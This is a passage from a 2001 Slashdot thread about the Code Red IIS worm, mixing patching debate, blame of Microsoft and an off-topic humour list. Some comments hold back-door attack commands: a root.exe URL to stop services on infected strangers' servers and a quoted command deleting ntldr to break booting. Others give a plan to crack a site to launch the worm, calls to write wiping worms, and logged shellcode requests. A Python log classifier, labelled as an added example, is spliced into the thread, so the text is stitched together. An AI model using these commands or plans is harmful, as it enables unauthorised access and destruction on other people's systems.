    2) Crack a pr0n server and replace a link to some good kiddy pr0n with a link that contains the url with the worm code pointed to the server found in step 1.

    3) You KNOW someone will hit that link and since the request never returns, he/she will go merrily on down the list thinking "damn, IE screwed up again".

    4) Once the CodeRed requests are spotted on the net, recrack the pr0n site and restore the link. Be sure and cover your tracks on this crack.

    Killed two, or maybe three birds with one stone. The worm is started, and if it does get tracked back to the original worm url, you take out a pr0n site and a peddy.

    Alternatively, crack any site that you think needs to be per^H^Hrosecuted.

  109. Re:Not SYSTEM-level access.... by baptiste · · Score: 2

    But Code Red II created virtual drives which allowed you to access cmd.exe directly via a corrupt explorer with root rights. So it had a pretty large back door to begin with - I look forward to the analysis of Code Red III if such a thing exists.

  110. Re:An ETHICAL way to Anti-Virus by nitehorse · · Score: 5, Informative

    Actually, if you add a line in your httpd.conf that looks like this:

    AddHandler cgi-script .ida

    then you can use Perl to write a quick script which will do the reverse lookup and then send that email. Or, if you want to use PHP instead, alter your AddType line for PHP to this:

    AddType application/x-httpd-php .php .php3 .ida

    Then restart apache, and throw a script named default.ida up to your DocumentRoot directory.

    -Chris

  111. How can Code Red Be Stopped? by skinney · · Score: 1

    I am really getting tired of this virus. I have @home and I have been getting hammered for the last 8 days. So bad that I can't even use my connection. I don't even have windoze, I'm running Mandrake 8. I just wish that some one would write a counter virus to fix the machines with the bio-hazard. *sigh*

    1. Re:How can Code Red Be Stopped? by sjonke · · Score: 1

      Simple: do like Israel and fire a barrage of missiles at buildings/homes that may contain computers running Windows, obliterating both the potentially offending computer and pathetic owner who would likely buy again.

      --
      --- What?
    2. Re:How can Code Red Be Stopped? by Anonymous Coward · · Score: 0

      The good thing that MS is getting out of all this is that IIS may take 10% of market share from Apache with all these hits scanning IIS sites. Not bad at all for MS. At the end, MS always will fault the lazy SysAdmin. :-)

  112. Re:Linux to the rescue? by Bagheera · · Score: 1

    This has been proposed on a number of mailing lists since the original CR1 incident. Variations of the "Let's write a good virus" theme have been around probably since the days of the original Morris WORM. In theory, it's a good idea, but the reality would probably turn out far less effective than we'd hope.

    A full discussion might actually be productive, but you'll probably find better threads on this idea on the vuln-dev or incidents mailing lists from securityfocus.

    --
    Never attribute to malice what can as easily be the result of incompetence...
  113. Something new in my logs.. by jvoisin · · Score: 1

    I am getting a new request in the logs now. It's the same as the XXXXXXX one minus the /default.ida? part. I have gotten two from separate servers.

    It looks like there actually may be a 3rd variant out there now...

    Pardon the paste from the logs..

    24.39.192.34 - - [10/Aug/2001:13:40:13 -0400] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 400 - "-" "-"
    24.93.248.122 - - [11/Aug/2001:00:23:50 -0400] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 400 - "-" "-"

    Has anyone gotten something similar or am I losing it?

    1. Re:Something new in my logs.. by Anonymous Coward · · Score: 0

      Oh sorry, that was just me poking around. No harm no foul.
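
    An added example, not code from anyone in this thread: a small Python log classifier that applies the naming rule ryanr gives above (N-padded .ida requests for CRv1/CRv2, X-padded for CodeRedII), flags the path-less X-padded variant jvoisin pasted, and separates back-door probes (root.exe / cmd.exe requests) from normal traffic in Apache combined log lines. It produces the per-IP summary an admin would want before sending the notifications nitehorse and cabbey describe; the sample log lines, IPs and function names are constructed for this example.

```python
import re
from collections import Counter

# Apache combined log format, matching the lines quoted in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (placeholder IPs); shellcode-looking tails are
# shortened copies of the %u sequences seen in the thread.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Aug/2001:13:40:13 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 276 "-" "-"
10.0.0.6 - - [10/Aug/2001:13:41:02 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 276 "-" "-"
10.0.0.6 - - [10/Aug/2001:13:41:09 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 276 "-" "-"
10.0.0.7 - - [11/Aug/2001:00:23:50 -0400] "XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u00=a HTTP/1.1" 400 - "-" "-"
10.0.0.8 - - [11/Aug/2001:01:02:11 -0400] "GET /c/winnt/system32/cmd.exe?/c+ver HTTP/1.0" 404 - "-" "-"
10.0.0.9 - - [11/Aug/2001:01:05:00 -0400] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
"""


def _request_target(request: str) -> str:
    """Return the request target from the quoted request field.

    A well-formed request is "METHOD target HTTP/x.y".  The malformed
    (HTTP 400) lines in the thread carry the payload in the first field,
    so fall back to that when no method keyword is present.
    """
    parts = request.split(" ")
    if len(parts) >= 2 and parts[0].isalpha() and parts[0].isupper():
        return parts[1]
    return parts[0]


def classify_request(request: str) -> str:
    """Label one request with the Code Red family it resembles (hypothetical labels)."""
    target = _request_target(request)
    low = target.lower()
    if "/default.ida" in low:
        query = target.split("?", 1)[1] if "?" in target else ""
        if query.startswith("NNNNNNNN"):
            return "codered_v1_v2"      # N-padding: original worm and its v2
        if query.startswith("XXXXXXXX"):
            return "codered_ii"         # X-padding: CodeRedII
        return "ida_other"
    if target.startswith("XXXXXXXX") and "%u" in target:
        return "codered_ii_nopath"      # X-padded payload with no /default.ida?
    if "root.exe" in low or "cmd.exe" in low:
        return "backdoor_probe"         # someone trying the CodeRedII back door
    return "normal"


def summarize(log_text: str):
    """Count hits per label overall and per source IP (worm traffic only)."""
    by_class = Counter()
    by_ip = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                    # skip lines that are not combined-format
        label = classify_request(m["request"])
        by_class[label] += 1
        if label != "normal":
            by_ip.setdefault(m["ip"], Counter())[label] += 1
    return by_class, by_ip


def suspect_hosts(log_text: str):
    """Sorted list of source IPs that sent at least one worm-shaped request."""
    _, by_ip = summarize(log_text)
    return sorted(by_ip)


if __name__ == "__main__":
    totals, per_ip = summarize(SAMPLE_LOG)
    for label, n in sorted(totals.items()):
        print(f"{label:20s} {n}")
    for ip in suspect_hosts(SAMPLE_LOG):
        print(ip, dict(per_ip[ip]))
```

    Reverse DNS for the notification step (socket.gethostbyaddr on each suspect IP) is left out so the example runs offline.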

  114. OK lets shut down infected boxes - by Ozric · · Score: 1, Redundant

    Why can't we use the open cmd.exe to shut down the IIS service on the infected boxes? I would like to know how to take control of an infected box and do just that. I don't know if it would be legal but, clogging up my connection with crap and not patching your server is just as bad. What is stopping us? Someone post how to do it please, I will shut down all the boxes attacking me and if enough people do it, we might just stop this bitch.

    1. Re:OK lets shut down infected boxes - by Anonymous Coward · · Score: 1, Informative

      http://ip/scripts/root.exe?/c+net+stop+IISSERVICENAME where IISSERVICENAME is the name of the IIS service, which I don't remember. The root.exe process might not have rights to do this, I am not sure.

  115. Code Red was launched by MS itself! by Anonymous Coward · · Score: 0

    MS now got shitloads of IPs of servers that run their products. I guess half of those weren't paid for.

  116. Patch them already... damnit! by kalislashdot · · Score: 1
    I don't get it, this is all over the tech news and people have not patched yet. Come on already.

    I run iPlanet (Netscape) at work and Apache at home and I just sit back and laugh at all the default.ida hits in my logs. My boss asked me "Are they getting anything?", and I said "Ya, a 404 error."

    1. Re:Patch them already... damnit! by Anonymous Coward · · Score: 0

      My, aren't you the coolest motherf'er in the IT dept?

  117. Re:Can the internet community sue microsoft? by darkPHi3er · · Score: 1

    "...but don't you technically pay for the license to use the software.."

    IANAL (but i act like one on /.), BUT that is ***CORRECT***, with M$ and most shrinkwrapped s/w, you are buying the license to USE the s/w, LEGALLY ***you DO NOT own the s/w***, there are a zillion reasons why this is done, but not least is the fact (and directly relevant here) that the owner of a thing has many many more legal rights than the lessor/borrower/stealer/renter of the same thing

    further, many products that have substantial liability and/or danger attached; car batteries, firearms, knives, nunchucks, network news, yada... have NO requirement to provide you an external warning. it is presumed that when you open the package, RTFM and assess the potential hazards that if you don't accept them, you'll return them. unless it's changed MS', agreement with its resellers forces the resellers to buy back any product not installed due to customer failure to accept the license....

    it may be more useful to think of s/w as similar to things that can affect large bodies of people, weather, war, famine, disease, religion, weapons of mass destruction, and other post-national affectors.....

    the only way that the use/adoption/deployment of any thing not deemed useful or in the common interest or outright dangerous, can be affected is by large #'s of responsible individuals who can coordinate together to stop/correct it...

    the Big Stuff (as always) must be handled by the administration of personal and civic responsibility...

    the Court system (any Court System, anywhere/everywhere) is at best simply a bunch of guys in one of grandma's old outfits, routinely applying predetermined logic blocks to roughly analogous situations..it was never meant to handle the Big Stuff and/or replace the aforementioned personal/civic responsibility...

    --
    Ten quid, she's so easy to blind. And not a word is spoken...
  118. Re:Interesting log entry by RWC09 · · Score: 1

    I started receiving the same thing after I UPGRADED to the new @HOME software in windows (I know I know - but the kids won't switch so I have to dual boot!). I'm running portsentry so it just blocks it out.

    --
    -->If Linux was written by Bill Gates & Co. - no one would want to switch !!
  119. Re:More info on Code Red III by Anonymous Coward · · Score: 2, Insightful

    At least give some credit!! That was originally a spoof of the Good Times hoax.

  120. Slashdot Humor by Futurepower(tm) · · Score: 3, Offtopic

    I've been making a list of the best of Slashdot humor. Here it is. In the beginning I did not record the user name:

    Lotteries are a tax on people who suck at math.

    "He that is wounded in the stones, or hath his privy member cut off, shall not enter into the congregation of the LORD." - Deuteronomy 23:1

    The metric system is the tool of the devil!! i get forty rods to the hogshead, and that's the way i likes it!!

    Someone had to put all that chaos there! by Greyfox (nride@uswest.net)

    I love vegetarians - some of my favorite foods are vegetarians.

    "Today's forecast calls for sprinkles of genius with a chance of doom!" - Stewie Griffin

    The truth does not set you free, it just makes everyone irritable.

    Which is worse: Ignorance or Apathy? Who knows? Who cares?

    It's pretty funny, actually. It all started when I thought that inflammable was the opposite of flammable...

    From a signature line at the end of every message: [Drink Coke] [Army - Be All You Can Be] [This ad space for sale! Contact the author for current rates]

    "You can't have everything. Where would you keep it?" -- Steven Wright

    A computer without a Microsoft operating system is like a dog without bricks tied to it's head. dieMSdie (steve@spam-is-bad.xtn.net)

    "Science is like sex: sometimes something useful comes out, but that is not the reason we are doing it" -- Richard Feynman

    This is a UNIX email virus. It works on the honor system: If you're running a variant of unix , please forward this message to everyone you know and delete a bunch of your files at random. Thank you for your cooperation. by pjl@patsoffice.com

    Error: Cannot find file REALITY.SYS - Universe halted, please reboot! (NoSpam_Jonathan_Bayer@bigfoot.com)

    It's sad to live in a world where knowing how to program your VCR actually lowers your social status... (rhopkins-at-crosswinds-dot-net)

    Disclaimer: The opinions expressed in this post are not necessarily mine, as I've not yet had my medication today. (jmblant@clemson.dontsendmespam.edu)

    When I have to develop under Windows, I spend long, frustrating days where mis-handling of a pointer causes BSOD, not a core dump. (Gen-GNU)

    "Linux is a beautiful thing, but beauty is in the eye of the beholder, and we're geeks.

    Be nice to your friends. If it weren't for them, you'd be a complete stranger. (Yamao)

    The white zone is for loading and unloading only by error 404 on Mon Jun 12th, 2000 at 10:30:10 AM EST, kuro5hin

    5.72 MOhms across my tongue... should i be concerned? MrResistor (mrresistor@hotmail.com) on Tuesday June 13, @03:38PM EDT (SD)

    "Why does everyone always overgeneralize?" by p3d0 on Monday June 05, @12:37PM EDT (SD)

    If at first you don't succeed, try a shorter bungee. by leonbrooks on Thursday June 15, @08:10PM EDT

    -- Any attempt to brew coffee with a teapot should result in the error code "418 I'm a teapot". The resulting entity body MAY be short and stout. [RFC 2324] by Eric Green (eric@badtux.org) on Thursday June 15, @03:48PM EDT

    The Internet interprets advertising as damage and routes around it. by Paul Crowley (slashdot-paul@cluefactory.org.uk)

    There are two kinds of people in this world -- Those who divide people into two groups and those who don't. by YogSothoth (jdumas9@z3eh.com (s/[0-9]//g)) on Friday June 16, @08:22PM EDT

    The Christian Right is Neither -- by cbuskirk (cbuskirk@yahoo.com) on Friday June 16, @07:35PM EDT

    Inertia's what makes the world go 'round. -- by rana on Friday June 16, @07:54PM EDT

    If you are angry with someone, you should walk a mile in their shoes... then you'll be a mile away from them, and you'll have their shoes. -- by hobbit (hamish@nutshell.SPAM.freeserve.SPAM.co.uk)

    Fruit flies like bananas... Time flies like the wind... by DanBari on Tuesday June 20, @02:19AM EDT

    Who is General Failure, and why is he reading my hard drive? mcelrath (mcelrath+slashdotcomment@draal.physics.wisc.edu)

    "One World, one Web, one Program" - Microsoft promotional ad "Ein Volk, ein Reich, ein Fuhrer" - Adolf Hitler by Wakko Warner (wakko@qwerty.bitey.net) on Wednesday June 21, @09:25PM EDT

    "'Tis some script kidd3z," I muttered, "tapping at my server port-Only this, and nothing more." by Barbarianconanford_please-no@spam-yahoo.com) on Thursday June 29, @07:11PM EDT

    The early bird gets the worm, but the second mouse gets the cheese. warpathwarpath@the-cantina.com) on Thursday July 06, @06:13PM EDT

    -o-"Warning: You are logged into reality as root..."-o- by Munky_v2email_me@www.dialug.org) on Friday July 07, @09:32AM EDT

    There are three types of people in the world; those who can count, and those who can't. -- by Uruks2mdalle@titan.vcu.edu) on Monday July 10, @02:04PM EDT

    All generalizations are false. -- by The_Messengerkmfms.com@drew) on Monday July 10, @04:07PM EDT

    A theory: Women do not, snore, burp, sweat or fart. Therefore, they must bitch, or they will explode. -- byy m0nkeyb0y on Wednesday July 12, @01:34AM EDT

    Why is it that it's a penny for your thoughts, but you have to put your two cents in? Somebody's makin a penny. --Steven Wright

    I've lost my faith in nihilism. -- by hey!mattleo@treehouse.acrcorp.com) on Monday July 17, @10:08AM EDT

    Being a geek means never having to ask, "Paper or plastic?" -- by Loligoljm@delete_this.fc.net) on Friday July 21, @01:40PM EDT

    "Ah yes, the Tomahawk Cruise missle... the rich country's car bomb." -- by Rand Race (helixp@nospam.bellsouth.net) on Friday July 21, @03:29PM EDT

    I am hypoallergenic, dermatologist tested, and dishwasher safe... -- by ecliptic_1 (ecliptic_1@spamsux.bigfoot.com) on Friday July 21, @09:49PM EDT

    The problems that exist in the world today cannot be solved by the level of thinking that created them. -- Einstein

    There is nothing more odious to me than an expensive church. -- by brogdonandrew(at)imagersoft.com) on Tuesday August 01, @02:58PM EDT (#106)

    "Bill Gates is just a monocle and a Persian Cat away from being one of the bad guys in a James Bond movie." - Dennis Miller

    Bad spellers of the world, untie! -- by Fjord_Reddfjord_redd@programmer_dot_net) on Wednesday August 02, @10:43AM EDT (#19)

    Every night, tired dyslexics around the world look forward to 8 hours of peels. -- by sirinekbillHATESSPAM@sirinek.com) on Wednesday August 09, @12:45PM EDT (#124) (User #41507 Info) http://www.sirinek.com

    "I do know I'm ready for the job. And, if not, that's just the way it goes." G. W. Bush 8/21/2000

    by NecroPuppy on Tuesday August 22, @10:51PM EDT (#14) (User #222648 Info) A friend of mine has a barcode on his arm. He rings up as a $.35 pack of JuicyFruit.

    Preserve Wildlife -- Pickle a squirrel today! by HydroCarbon10synth903@hotmail.com) on Thursday September 07, @10:48AM NT (#23)

    You know lately I've been thinking recently about the sig system. I really think that 120 characters seems a bit restr -- by Valar nospamyalusers.kungfoo@linuxstart.com) on Thursday September 07, @11:07AM NT (#74) (User #167606 Info)

    "Don't anthropomorphize computers. They hate that." -- by poiu on Thursday September 07, @10:50AM NT (#124) (User #106484 Info)

    5 out of 4 People have problems with fractions. -- by fjordboy noneofyourbeeswax@noneofyourbeeswax.com) on Sunday September 10, @07:16PM EDT (#116) (User #169716 Info) http://www.iceball.net

    Never miss a good chance to shut up. -- by Aleatoricrsanders@webzone.net) on Monday September 11, @03:15AM EDT (#46) (User #10021 Info)

    Give me ambiguity or give me something else -- Re:That last ten percent... (Score:2, Informative) by seanmeistersubsynthesis@subdimension.com) on Wednesday September 20, @04:37PM EDT (#53) (User #156224 Info)

    The music business is a cruel and shallow money trench, a long plastic hallway where thieves and pimps run free and good men die like dogs. There's also a negative side. - Hunter S Thompson

    Apocalypse n. Writings from Jewish authors... designed to cheer the hearts of the Jewish people (Webster) -- My password... (Score:1) by MrScience on Friday September 29, @12:06PM EDT (#221) (User #126570 Info)

    If at first you don't succeed, it is quite certain you will give up skydiving. -- Maybe it just crashed? (Score:2, Informative) by LilGuy on Wednesday October 04, @04:44PM EDT (#54) (User #150110 Info)

    I'm a dyslexic agnostic with insomnia... I lie awake at night wondering if there really is a dog! -- Re:Electoral College (Score:1) by Q-Hack!kc5aot_HATES_SPAM_@qsl.net) on Thursday October 19, @09:49AM PDT (#23) (User #37846 Info) http://www.qsl.net/~kc5aot

    Sponsored by: Chork Lite - Because having an active lifestyle doesn't mean you have to give up jellied meat. -- by Towertwrau.p.dueirml@eo) on Tuesday May 01, @01:03PM EST (#60) (User #37395 Info)

    I'm in search of myself. If you found me before I arrive, please have me wait. -- by jsse on Wednesday May 02, @09:50PM EST (#63) (User #254124 Info)

    "Time's fun when you're having flies." - Kermit the Frog -- by joshyboy on Wednesday May 02, @09:31PM EST (#17) (User #237516 Info)

    ...A no smoking section in a restaurant is like having a no peeing section in a swimming pool... -- From whats been happing..... (Score:1) by SGDarkKnight on Monday May 07, @11:51AM EST (#30) (User #253157 Info)

    I'm in search of myself. If you found me before I arrive, please have me wait. -- Very bad case for US (Score:2) by jsse on Thursday May 17, @03:40AM EST (#11) (User #254124 Info)

    Swearing is the crutch of inarticulate mother fuckers. -- whitehouse.gov. IN CNAME hongkonggov.cn (Score:1) by xodiakbrad AT geeknet DOT net) on Thursday July 19, @03:45PM PDT (#15) (User #95699 Info) http://www.pander.org/

    If Bill Gates had a nickel for every time Windows crashed... ..oh wait, he does. -- by Nate Fox (slashdotatdafox.org) on Friday August 10, @11:00AM PDT (#54) (User #1271 Info)

    -

    --
    Bush's education improvements were
    1. Re:Slashdot Humor by 0vi_king · · Score: 0, Offtopic

      Great collection. There needs to be a "classic slashdot" section, and this would be one of the exhibits.

      --
      - Life is what keeps you occupied while you are waiting to die
  121. The guy does have a point by TheMidget · · Score: 2, Informative

    Certain Cisco routers crash when they get a Code Red probe. Supposedly, they have a built-in webserver for configuration purposes. So unplugging/replugging the router may occasionally be necessary.

  122. why doesn't it stop? by matman · · Score: 2

    I think that a large proportion of the infected machines are the desktops of users who just installed IIS along with the rest of everything because they didn't know what they needed and what they didn't. These are boxes that don't have systems admins to patch them. I'll bet that half of these people don't even know that they have IIS installed, and if they do, they don't realize that they're infected since their files are all still there and the virus hasn't popped up a HUGE message on their screen saying "YOU ARE INFECTED".

    1. Re:why doesn't it stop? by Anonymous Coward · · Score: 0

      gotta cut the cruft somehow

    2. Re:why doesn't it stop? by dermotfitz · · Score: 1

      Well, I told the people where I work to go to windowsupdate.microsoft.com to get patches for the worm (jul 19) and they were greeted with "Hacked By Chinese".
      We all know that now but after they downloaded all the recommended patches, the virus came back. Turns out you can't trust that site at all. It didn't recommend the patch that was needed. It didn't even recommend the SP2 for win2k.

      --

      How perfectly goddamn delightful it all is, to be sure. - Charles Crumb
    3. Re:why doesn't it stop? by linuxrochester · · Score: 0

      If this is true (which I believe some of it is), then Micro$haft should put the fix on the update site. If these people aren't computer savvy enough to know what to install and what not to, chances are they are going to the update site through IE anyways.

  123. Re:Microsoft should be sued by IronChef · · Score: 1


    Yes, I agree the current anti-gun-make suits are ridiculous. May as well sue Ford when an Escort is used as a getaway car.

  124. Re:I think you're on to something... by Fluid+Truth · · Score: 1

    Whoops...the link is right, the text is not. There's no "www" in there. Just click. I promise it's not goatse.cx. :-)

    --
    Apparently, of the rich, by the rich, for the rich.
  125. Donate them to charity by WillSeattle · · Score: 1

    The lead story said: I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.

    You should donate them to charity. I hear Bill G could use them.

    --
    --- Will in Seattle - What are you doing to fight the War?
  126. Re:It's not like they haven't announced the patch by muffel · · Score: 1
    But it would be insane to propose MS should force-feed this server patch to all their customers.
    Microsoft never had problem trying to force-feed their products to every single bloody PC on this planet.
    They simply don't give a sh*t. And why would they? As long as the press is kissing their butt, what's to worry about? The customer? Yeah, right.
    --

    bla
  127. Re:Tested, working... Effective. by Russ+Nelson · · Score: 2

    /root.exe?/c+del+/a+srh+/q+/f+c:\ntldr.*

    Bye bye boot process...


    I don't want to make the machine unbootable. I just want to disable Code Red.

    -russ

    --
    Don't piss off The Angry Economist
  128. Re:Bad piggyback, but.. by Charm · · Score: 1
    It wastes vast amounts of bandwidth.

    It has had some ISPs disconnect internal port 80 connections, resulting in some Apache or other webservers no longer being able to work. Yeah, and patched IIS ones too.

    It gives unix users a new hobby: reading Code Red hits in their logfiles.

    It is a new FAD.

    --
    -- RTFM:Slackware::Beer:Saturday
  129. Re:Microsoft should be sued by norton_I · · Score: 2

    A lot of people have said that other software packages can install IIS without telling the user about it.

    I also don't know the details of how to install IIS on W2KPro, but I bet it isn't that hard to do "accidentally" -- if nothing else, I can see people just checking everything "just in case" without realizing that that meant it would run automatically on boot.

  130. Re:Stop addressing Code Red by purplemonkeydan · · Score: 1

    I've NEVER seen that before. What version of SQL were you installing?

  131. Re:Buffer overflow vulnerabilities by jrockway · · Score: 1

    Then again, a java program that prints "Hello, World!" uses 100% CPU on my machine (G3/233, Debian/PPC). C++ doesn't have this problem.

    --
    My other car is first.
  132. Comment removed by account_deleted · · Score: 2

    Comment removed based on user account deletion

  133. Re:Microsoft feature? by michael_cain · · Score: 2
    At least by hearsay, the default installation of Win2K sets the box up to run IIS. In the cable modem networks (with which I am peripherally involved), I suspect that a large fraction of the infected machines are owned by people that do not know that they are "operating a server."

    MS is not alone in this type of negligence. For far too long, Red Hat Linux installations defaulted to having sendmail run, and had it configured so it would forward e-mail.

  134. Re:Redundant Response by Anonymous Coward · · Score: 0

    different states/provinces/countries have different outtakes on that, depending on the severity

  135. Re:Microsoft should be sued by sbayne · · Score: 1

    What if Mr. Schmoe wants to use his spiffy MS web authoring tool, Frontpage? or Visual Interdev? On win9x they'll both try to install the PWS. What do they do on NT/2k?

    IIRC, the various dialogs are full of "without this feature, you will not get the full functionality..." messages, and NOT full of "You are installing an Internet Service, with all the responsibility that this implies" messages.

  136. CR=TN? by Anonymous Coward · · Score: 0

    Is Code Red = T.H.E N.E.T? Imagine when it's done..

  137. Bill Gates to Apologize? by bear_phillips · · Score: 1

    Remember those ads that had Ford CEO Jacques Nasser saying "We are doing everything possible to fix this tire situation"? Wouldn't it be cool if Bill Gates would do the same thing? Might be good for his PR.

    --
    http://www.windmeadow.com/
    1. Re:Bill Gates to Apologize? by linuxrochester · · Score: 0

      He won't apologize. That would be admitting that Micro$haft created an inferior product. His ego would never let that happen. Hopefully more people will just dump IIS and run real web servers

  138. It's Quite Unfortunate. by viper21 · · Score: 1

    Code Red won't be a huge problem until the script kiddies start to exploit the holes.

    Those people posting apache logs of infected machines are just as guilty as those who use those logs maliciously.

    One would think that, even though this is "Microsoft's Fault", we would have some compassion and make an attempt to stop the damage where we can.

    What a merry band we are. My box can't get infected, but here is a list of machines you can go exploit.

    -S

    1. Re:It's Quite Unfortunate. by Gnea · · Score: 1

      i bleeped out my IP, now pay attention and chew on your toenails some more ;)

  139. Re:Copycats by Anonymous Coward · · Score: 0

    Now that the Trilogy is finished it's time to work on the prequels .. All the special effects and all the l337 new characters in the world are not going to help it - but we can't let it die.

  140. I've got a virus on my machine by WillSeattle · · Score: 2, Funny

    It keeps popping up these annoying ads every time I visit a web site, and leaving them under the browser window, so I have to close each one.

    None of my antivirus software packages seem to be able to detect it, though ...

    --
    --- Will in Seattle - What are you doing to fight the War?
  141. Re:One problem.... by Anonymous Coward · · Score: 0

    I don't understand how they couldn't know. I have installed quite a few NT 4 boxes and a couple of 2000, and I have never once seen IIS install itself. Is there something I am missing?

  142. Re:Microsoft should be sued by Keith+Russell · · Score: 2
    yeah, this is true, but it is MS that has it turned on by default w/o letting the average user (which by the way is their intended target) know.
    Only on server versions of NT or 2000. The average user will have some 9x mutation, which renders the point moot. No IIS, no exploit. The average 2000 user will install 2000 Professional which, while capable of running IIS, does not install it automatically. As I mentioned in an earlier post, you must go through a couple dialogs and explicitly check the IIS line item.

    The only versions of 2000 that install IIS by default are all server variants. That target market damn well better know what they're getting. That won't include the average user. If they really want a web server, the sticker shock of 2000 Server will send them to Linux.
    --
    This sig intentionally left blank.
  143. At the risk of being redundant.. by citizenc · · Score: 0, Redundant

    .. why doesn't somebody just code up a worm similar to Code Red, but one that applies the IIS server patch? It could be done anonymously, just like the worms are.. I'd do it myself, but I'm not a coder. =/

    1. Re:At the risk of being redundant.. by Anonymous Coward · · Score: 1, Redundant

      I know it's bad to say, but maybe it's time to write one that wipes the systems of the people who haven't patched yet. Some people really should learn about computer security the hard way.

  144. Stop addressing Code Red by I_redwolf · · Score: 4, Insightful

    and start addressing the primary issue at hand. The issue is system administrators need to take proactive measures to make sure their systems have been patched. That's the problem and that's what needs to be addressed. There is nothing significantly fascinating about this program that deserves any notoriety. It didn't find some weird flaw in design. It just exploits a buffer overflow, which has always been a problem in people's code. It's a really simple thing to fix at that. Enough about Code Red and more about the underlying problem.

    1. Re:Stop addressing Code Red by mpe · · Score: 2

      Also, try going to the IP addresses in the log files - most of them are the "this page is under construction" default page from IIS. Looks like a web server installed as "that sounds cool", and not ever used.

      Or more likely it gets installed by default and until CR came along no-one even knew it was there...

    2. Re:Stop addressing Code Red by kolding · · Score: 1

      One problem is that some people don't even know they're susceptible. I just spent 2 hours removing Code Red xxx from NT Server, because I didn't know that I even had IIS on there. I put SQL Server on the box, and guess what, it installed IIS for me.

    3. Re:Stop addressing Code Red by Anonymous Coward · · Score: 0

      Except the problem isn't just sysadmins. It's also the home user who probably w4r3z'd his copy of Win2k, thought Internet Information Server was necessary for it to work, and has no idea his box is a webserver.

    4. Re:Stop addressing Code Red by Dr.+Smeegee · · Score: 1

      Wow. That sucks. Was there no choice to _not_ install it?

    5. Re:Stop addressing Code Red by purplemonkeydan · · Score: 1
      Microsoft (or any other software company) should be responsible for selling defective products.

      Like RedHat? Put an unpatched RH 6.2 server on the Net and see how long it lasts.

    6. Re:Stop addressing Code Red by awilber · · Score: 1

      You really think system administrators are the problem? I don't think so.

      What do you think the ratio of code red infections on residential broadband customers boxen to code red infections on any system that actually has a system administrator is?

      My guess is 10 to 1.

    7. Re:Stop addressing Code Red by RossyB · · Score: 1

      A huge log analysis of the original Code Red attack shows over 60% of IPs were from American DSL/ISP users. aol.com, home.com, rr.com etc.

      Also, try going to the IP addresses in the log files - most of them are the "this page is under construction" default page from IIS. Looks like a web server installed as "that sounds cool", and not ever used.

    8. Re:Stop addressing Code Red by Anonymous Coward · · Score: 0

      Stop addressing Code Red and start addressing the primary issue at hand. The issue is system administrators need to take proactive measures to make sure their systems have been patched.

      Bad analogy. It's more like, Microsoft sold you a car with seatbelts that work perfectly fine. But some guy keeps coming over and hitting them with a hammer. Should we expect them not to break?

    9. Re:Stop addressing Code Red by KlomDark · · Score: 1

      I really liked this quote (from the same article) too: This process [Security Insurance] changes everything. What will happen when the CFO looks at his premium and realizes that it will go down 50% if he gets rid of all his insecure Windows operating systems and replaces them with a secure version of Linux? The choice of which operating system to use will no longer be 100% technical. Microsoft, and other companies with shoddy security, will start losing sales because companies don't want to pay the insurance premiums. In this vision of the future, how secure a product is becomes a real, measurable, feature that companies are willing to pay for...because it saves them money in the long run.

    10. Re:Stop addressing Code Red by Ratbert42 · · Score: 1

      Exactly. I'm a lazy sysadmin. I hate applying patches every week. So I do a good job securing the box in the first place so I don't have to. But lots of sysadmins are worse than lazy. They're stupid.

      I manage one IIS server and have to deal with sysadmins who manage another 6 or so IIS servers. My server is the only one that doesn't have the default mapping of the .ida extension to the index server DLL. Nobody else is using index server, but they ignored (or never even read) Microsoft's own documents about securing IIS. When the next buffer overflow in an unused DLL is found, their servers will be vulnerable and mine won't be.

      I got to do a post mortem on one IIS server at my company that was infected with CodeRed.v3 (call it what you want, it's the XXXXX one). How did they notice that the box was infected? Did they notice the increased traffic? Nope. Did our intrusion detection system catch it? Nope -- it hasn't been updated in months. So how did they find out? When I recognized their internal IP in my logs, attacking my server. Another admin came in to fix it. He applied the Microsoft patch for the .ida vulnerability and rebooted. That's it. He didn't close any of the backdoors or anything. I sent him and his boss an e-mail with links to the backdoors on his box and a list of what to fix.

    11. Re:Stop addressing Code Red by ryanvm · · Score: 2
      Stop addressing Code Red and start addressing the primary issue at hand. The issue is system administrators need to take proactive measures to make sure their systems have been patched.

      Bullshit. Do you also think that someone should have to constantly replace the seatbelts in their car because they just spontaneously break?

      Microsoft (or any other software company) should be responsible for selling defective products.

    12. Re:Stop addressing Code Red by Geoff · · Score: 2, Interesting
      The issue is system administrators need to take proactive measures to make sure their systems have been patched. That's the problem and thats what needs to be addressed.

